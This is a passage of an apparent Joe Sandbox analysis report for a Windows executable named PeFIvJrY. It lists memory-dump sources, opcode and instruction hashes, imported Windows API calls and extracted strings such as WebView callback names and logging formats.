                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: e69b9b65f8d4e5cc382fad9bed4a507efbd0fc2b7a21ecde5a811c37a3374345
                                • Instruction ID: 7813b96c9b8250002290ed029b89396380b4a2f092ac0b8a175b413754be6ba7
                                • Opcode Fuzzy Hash: e69b9b65f8d4e5cc382fad9bed4a507efbd0fc2b7a21ecde5a811c37a3374345
                                • Instruction Fuzzy Hash:
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b1a13c1892399e18cc966883bfb29ece94d7e33c837d020d71dac5e4680327e7
                                • Instruction ID: 22a4fb71f38837b87259d9891ee338f803d896cf0a7ead4750b7a462887ce9f9
                                • Opcode Fuzzy Hash: b1a13c1892399e18cc966883bfb29ece94d7e33c837d020d71dac5e4680327e7
                                • Instruction Fuzzy Hash: 5812E3B1A006058FCB24DF29D4816AAF3F1FF88315B14853FD85A97741EB39E985CB98
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a82505fcde4dbd2dbbd0442f6c8146852b5a0def08571afe8ebd44a05a29bd68
                                • Instruction ID: 427c2c7934747a0677643f3068afec50e332ed7de267e0e9b830e2a353e78cb6
                                • Opcode Fuzzy Hash: a82505fcde4dbd2dbbd0442f6c8146852b5a0def08571afe8ebd44a05a29bd68
                                • Instruction Fuzzy Hash: DA124E71A016069FC724DF29C8409AAF7F6AF54304724CA3ED4AAC3B41E735F995CB86
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1968064b506e494423fcef45e5640b402f3070c958a2950d49b1f4cb0382a17e
                                • Instruction ID: 675094e9660efa9a98960d77a209a0dd34ffb7b017aa6bee8768756af268b813
                                • Opcode Fuzzy Hash: 1968064b506e494423fcef45e5640b402f3070c958a2950d49b1f4cb0382a17e
                                • Instruction Fuzzy Hash: 09527FB0500709EFE728EF54E8C8199BBB6FB6A324F904209C5515F2D8E77464EACF64
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f7dd7546770ff8a512fd19ffc8ea56c155ee7232813058fd4dc4a6fe069dda5
                                • Instruction ID: 3142676c601db73ebec77ea21c3e24af1b70b8e5947ec64bfd245a756a65a018
                                • Opcode Fuzzy Hash: 5f7dd7546770ff8a512fd19ffc8ea56c155ee7232813058fd4dc4a6fe069dda5
                                • Instruction Fuzzy Hash: 6DB15E71E002098BDF08CF69D9916ADF7B2EF98310F24453AE516EB391D738AD418B99
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849680504.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6300000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c77898385efcf6684f0311d55232716ecfeb99ae6f7515f36adfaaf05c50d6e
                                • Instruction ID: a896b453a06fe0ebfb0ff21b3ac230d2cb278685e6d8c9092e50e84447ae0ccf
                                • Opcode Fuzzy Hash: 9c77898385efcf6684f0311d55232716ecfeb99ae6f7515f36adfaaf05c50d6e
                                • Instruction Fuzzy Hash: 77A1A232E00219CFDF59DFB4C850ADEB7B2FF88300B15416AE915AB265DB31E959CB90
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5cd17d35d063025fee93bdc2b3cec45270f634cba21f955d7a87546b98de82ab
                                • Instruction ID: 923497440c90c77f1fda99b905b6a301c334bb4dcece4e915174540f2bd3e9fc
                                • Opcode Fuzzy Hash: 5cd17d35d063025fee93bdc2b3cec45270f634cba21f955d7a87546b98de82ab
                                • Instruction Fuzzy Hash: 34516436E006199BCB15CEA9C4806EFF7B1BF99310F1483ABD855A7345DB38ACC18B94
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b9d18c64b5ced81f48a37d20f8c2b6d349d9f4b52c122071389d820f4c52bb5
                                • Instruction ID: 64fe59029e1cf3b3cff5ff3298a445e1d810181f93f4cd731a6be316aa00d423
                                • Opcode Fuzzy Hash: 1b9d18c64b5ced81f48a37d20f8c2b6d349d9f4b52c122071389d820f4c52bb5
                                • Instruction Fuzzy Hash: 4541382204DBD6BECBBA8F3498A58F3FFF9AD97310369A9DDE4C145403C2115586E7A0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c9f52e69266f64921673b8a5f076f082824a15793def8002bf476e99a4e871d
                                • Instruction ID: 093890b326f9fae75277af9ef7981d7158148261b5854e37fc1febef2c921481
                                • Opcode Fuzzy Hash: 2c9f52e69266f64921673b8a5f076f082824a15793def8002bf476e99a4e871d
                                • Instruction Fuzzy Hash: E821252204DBCABECB7A8F3498E58E3FFF9AD57310369A9CDE4C085403C2115586E7A0
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e94e638ba1e09ebc6a1eecacf924f416c9b8850e26d1800b3f6b181a54c76f73
                                • Instruction ID: a5c4ed469d2ecbe53236111add732e99d9428c8c7847dd60ba94347b65bb8fdb
                                • Opcode Fuzzy Hash: e94e638ba1e09ebc6a1eecacf924f416c9b8850e26d1800b3f6b181a54c76f73
                                • Instruction Fuzzy Hash: ED11F52604E6C97DCB769F7498A48E3FFFAAD9B310369A9CDE5C085003C5124547E7A4
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb661421d0cbc1a6a407777b4be298e4ad0a098c8258ed1f8fd04651957c7f4e
                                • Instruction ID: d482dc5c5f4f5d9b530fd9f34f1641b322c892690f095ec24d58e192bba5419a
                                • Opcode Fuzzy Hash: cb661421d0cbc1a6a407777b4be298e4ad0a098c8258ed1f8fd04651957c7f4e
                                • Instruction Fuzzy Hash: A3F03032A11224EFDF1AD748D805E5973ACEB4AB65F115467E501D7260D3B4DD00C7C8
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c4ba01c3ca842f244c402fef3ad5bf9d7a9ccc66e175a0f83c61bafc6002d44
                                • Instruction ID: 5c6917b0a1fa0f81874c5a7412129e4f460f181200b9693932849925fc2960c5
                                • Opcode Fuzzy Hash: 5c4ba01c3ca842f244c402fef3ad5bf9d7a9ccc66e175a0f83c61bafc6002d44
                                • Instruction Fuzzy Hash: 48E04672911238EBCB18EB89D944D8AB2ACEB49B44F11409AB501D3220C274DE00CBD8
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 525fefa8eedbc72395681fd105259806d3d12c30c224c9c87795d928887dac08
                                • Instruction ID: 778f82091a5d50db6e37ed98564b31aa7a95b53374400757ddc1faeb9885942e
                                • Opcode Fuzzy Hash: 525fefa8eedbc72395681fd105259806d3d12c30c224c9c87795d928887dac08
                                • Instruction Fuzzy Hash: E1C08C34200A90C6CE29DA1292B53A73394B3D1B82FD0148EC4020B782C52E9C86D60A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$Init$Copy
                                • String ID: open
                                • API String ID: 1711229386-2758837156
                                • Opcode ID: 590c04a3c1ce09e03022edbf41a1644e8e7bcb547060205e1c0055749676a958
                                • Instruction ID: d859e0b7b73fc69476e62faf7cf19818ec3131e3b62c95748ef7997125a54d94
                                • Opcode Fuzzy Hash: 590c04a3c1ce09e03022edbf41a1644e8e7bcb547060205e1c0055749676a958
                                • Instruction Fuzzy Hash: 66F11875E0025D9BDF11DFA8DC45BEEB7B4FF08314F14422AE905A7290E778AA80CB54
                                APIs
                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000400,?,00000100,00000000,A05DD77D), ref: 003E2863
                                • GetCurrentThreadId.KERNEL32 ref: 003E28D2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentFormatMessageThread
                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$LogNt$Msg:[%ws] $ReturnHr$ReturnNt$[%hs(%hs)]$[%hs]
                                • API String ID: 2411632146-1363043106
                                • Opcode ID: 8a4b6d94b23ed4b9677e6cf4467df126ccc037dff59b258d40f9543d199ed4ef
                                • Instruction ID: 26f922fea85b594cfa6e56c0d506b036d983d65e83a9fc6bd09563c1afe5b54a
                                • Opcode Fuzzy Hash: 8a4b6d94b23ed4b9677e6cf4467df126ccc037dff59b258d40f9543d199ed4ef
                                • Instruction Fuzzy Hash: BA61E674A00395ABEB259F26CC4AF67B7ACEB44704F04465DBC05572C2E7B4AD50CB64
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: OnAppAbortWebView$OnAppErrorWebView$OnAppInitWebView$OnAppShutdownWebView$OnBrowserInitWebView
                                • API String ID: 0-3757888159
                                • Opcode ID: a3e34720728941d211d0f8c47a6e42f1776a57b43197121a4f98d57c39dcda5f
                                • Instruction ID: 3fa822e2d748ff5f748b9e653d2cf066b4bb6d87b5574dbfe72a5660cac22ff6
                                • Opcode Fuzzy Hash: a3e34720728941d211d0f8c47a6e42f1776a57b43197121a4f98d57c39dcda5f
                                • Instruction Fuzzy Hash: CA5125B1A4431DABFB36EB68DC05B797764AF00304F15046AE744A61A3FBF58D808B99
                                APIs
                                • GetProcAddress.KERNEL32(?,FDICreate), ref: 00421865
                                • GetProcAddress.KERNEL32(?,FDICopy), ref: 004218A8
                                • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 004218EB
                                • FreeLibrary.KERNEL32(00000000), ref: 00421946
                                • GetLastError.KERNEL32 ref: 004219B6
                                • GetLastError.KERNEL32 ref: 004219D8
                                • GetLastError.KERNEL32 ref: 004219FA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressErrorLastProc$FreeLibrary
                                • String ID: @$Cabinet.dll$FDICopy$FDICreate$FDIDestroy
                                • API String ID: 329358263-233332848
                                • Opcode ID: 8daff8759ef4c95e3d55ff2d2a01b9ec1c3cc6e393138a95d1c58458916fe2cf
                                • Instruction ID: 7e04152c9aa67c5f3eb6a6bd4a1fce0fbeacfd2a0f89da8d9ddd5f815b82455f
                                • Opcode Fuzzy Hash: 8daff8759ef4c95e3d55ff2d2a01b9ec1c3cc6e393138a95d1c58458916fe2cf
                                • Instruction Fuzzy Hash: 5D61E174E012289FCB00DFA8E9557AE7BB4EB19700F10412FE912A73A1DF785905CBAD
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00464694,00000FA0,?,?,00425C1B), ref: 00425C49
                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00425C1B), ref: 00425C54
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00425C1B), ref: 00425C65
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00425C77
                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00425C85
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00425C1B), ref: 00425CA8
                                • RtlDeleteCriticalSection.NTDLL(00464694), ref: 00425CC4
                                • CloseHandle.KERNEL32(00000000,?,?,00425C1B), ref: 00425CD4
                                Strings
                                • WakeAllConditionVariable, xrefs: 00425C7D
                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00425C4F
                                • kernel32.dll, xrefs: 00425C60
                                • SleepConditionVariableCS, xrefs: 00425C71
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                • API String ID: 2565136772-3242537097
                                • Opcode ID: 97edf29053753ac0aa98588afc30e1b02580f1683a61015aed69a14c21fd3ec4
                                • Instruction ID: 960df86cd94121aa738e23019e7eb226d932e50b98b6e8e23a4d624778daefac
                                • Opcode Fuzzy Hash: 97edf29053753ac0aa98588afc30e1b02580f1683a61015aed69a14c21fd3ec4
                                • Instruction Fuzzy Hash: 790179797417116BEB205F75FD09B5B3A98AB83701B140432FD09D2350FBBCC8508A5D
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F3120
                                • VariantInit.OLEAUT32(?), ref: 003F313E
                                • VariantCopy.OLEAUT32(?,?), ref: 003F3148
                                • VariantInit.OLEAUT32(?), ref: 003F315E
                                • VariantCopy.OLEAUT32(?,?), ref: 003F3168
                                • VariantClear.OLEAUT32(?), ref: 003F31D6
                                • VariantClear.OLEAUT32(?), ref: 003F31DC
                                • VariantClear.OLEAUT32(?), ref: 003F31E2
                                  • Part of subcall function 003EEEB0: VariantInit.OLEAUT32(?), ref: 003EEEEA
                                  • Part of subcall function 003EEEB0: VariantChangeType.OLEAUT32(00000000,?,00000000,00000003), ref: 003EEF12
                                  • Part of subcall function 003EEEB0: VariantClear.OLEAUT32(00000000), ref: 003EEF23
                                  • Part of subcall function 003EEEB0: _com_issue_error.COMSUPP ref: 003EEF46
                                • _com_issue_error.COMSUPP ref: 003F3204
                                • _com_issue_error.COMSUPP ref: 003F320A
                                • VariantInit.OLEAUT32(A05DD77D), ref: 003F3244
                                • VariantClear.OLEAUT32(?), ref: 003F3297
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                 • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$_com_issue_error$Copy$ChangeType
                                • String ID:
                                • API String ID: 3635750008-0
                                • Opcode ID: 7c88cb93736e9b3f27ba3a6ee7f9b23163d321b3628f702a965cc39b10bbd74a
                                • Instruction ID: 7b09e7d5885c32cb05e23736e530b296179c5cb4fc949075ae7bf8aa6ecf2570
                                • Opcode Fuzzy Hash: 7c88cb93736e9b3f27ba3a6ee7f9b23163d321b3628f702a965cc39b10bbd74a
                                • Instruction Fuzzy Hash: 75514775D0025DEBCB01DFA8CD45AEEBBB8FF49314F10462AE915B7250EB34AA44CB90
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F39B0
                                • VariantInit.OLEAUT32(?), ref: 003F39CE
